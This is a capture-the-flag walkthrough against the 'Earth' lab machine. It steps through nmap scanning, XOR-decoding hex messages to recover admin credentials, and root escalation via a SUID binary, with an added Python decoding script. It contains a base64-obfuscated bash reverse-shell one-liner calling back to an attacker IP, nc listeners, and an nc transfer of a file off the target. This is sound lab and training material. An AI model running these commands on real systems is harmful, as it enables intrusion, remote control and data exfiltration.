BiAnco 2025-01-09 Source: SecHub Cybersecurity Community
Target address: 192.168.31.132
Scan the target's open ports with nmap
nmap -A -p 1-65535 192.168.31.132
The scan shows DNS names on port 443; add the corresponding entries to the hosts file
Gather information on earth.local
Found Previous Messages
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
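Scan the earth.local directories
Gather information on terratest.earth.local
Scan the terratest.earth.local directories
Found a robots file; view it
It lists a testingnotes file; fuzzing the extension shows that it is testingnotes.txt
The file roughly says that XOR is used, that the content of testdata.txt is the encryption key, and that terra is the username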
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
Decrypt with CyberChef; the password is the repeating content earthclimatechangebad4humans
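The same XOR decode as the CyberChef step, written as a Python script. This is an added example, not part of the original write-up. The sample ciphertext and the noise message are constructed in the code rather than copied from the site, and the function names are hypothetical.

```python
from itertools import cycle

# Key material: the testdata.txt text as quoted in this write-up.
KEY = (
    b"According to radiometric dating estimation and other evidence, Earth "
    b"formed over 4.5 billion years ago. Within the first billion years of "
    b"Earth's history, life appeared in the oceans and began to affect "
    b"Earth's atmosphere and surface, leading to the proliferation of "
    b"anaerobic and, later, aerobic organisms. Some geological evidence "
    b"indicates that life may have arisen as early as 4.1 billion years ago."
)
PASSWORD = b"earthclimatechangebad4humans"  # result stated in the write-up


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key if data is longer."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def decode_message(hex_msg: str, key: bytes = KEY) -> bytes:
    """Hex-decode a message and XOR it with the key (XOR is its own inverse)."""
    return xor_bytes(bytes.fromhex(hex_msg), key)


def readable_decodes(hex_msgs, key: bytes = KEY):
    """Decode every message; keep only results that are printable ASCII."""
    decoded = (decode_message(m, key) for m in hex_msgs)
    return [d for d in decoded if d and all(32 <= b < 127 for b in d)]


def shortest_period(text: bytes) -> bytes:
    """Shortest prefix whose repetition reproduces text (last copy may be cut)."""
    for n in range(1, len(text) + 1):
        if all(text[i] == text[i % n] for i in range(len(text))):
            return text[:n]
    return text


# Constructed samples (not copied from the site): the repeated password
# encrypted under KEY, and a noise message that decodes to non-text bytes.
SAMPLE_HEX = xor_bytes((PASSWORD * 20)[:len(KEY)], KEY).hex()
NOISE_HEX = bytes(range(200, 240)).hex()

if __name__ == "__main__":
    for plain in readable_decodes([NOISE_HEX, SAMPLE_HEX]):
        print(shortest_period(plain).decode())
```

Passing every message from the page to readable_decodes leaves only the one that was encrypted under this key, and shortest_period collapses its repeated plaintext to a single copy.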
Log in at earth.local/admin/login with user terra and password earthclimatechangebad4humans
Use the find command to look for the flag
Found the flag file at /var/earth_web/user_flag.txt; view its contents with cat
Build a reverse shell
echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjEzMC84ODg4IDA+JjEnCg== | base64 -d | bash
Listen on Kali
nc -lvnp 8888
Privilege escalation
find / -perm -u=s -type f 2>/dev/null
There is a reset_root file; run it
It reports an error; transfer it to Kali with nc for local analysis
nc -lvp 8888 > reset_root
Command on the target
cat /usr/bin/reset_root | nc 192.168.31.130 8888
Check the file type with file
file reset_root
It is a Linux executable
ltrace ./reset_root
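These files turn out not to exist; create them manually on the target
Run reset_root again
The root user's password has been reset to Earth
Obtain root privileges and view the flag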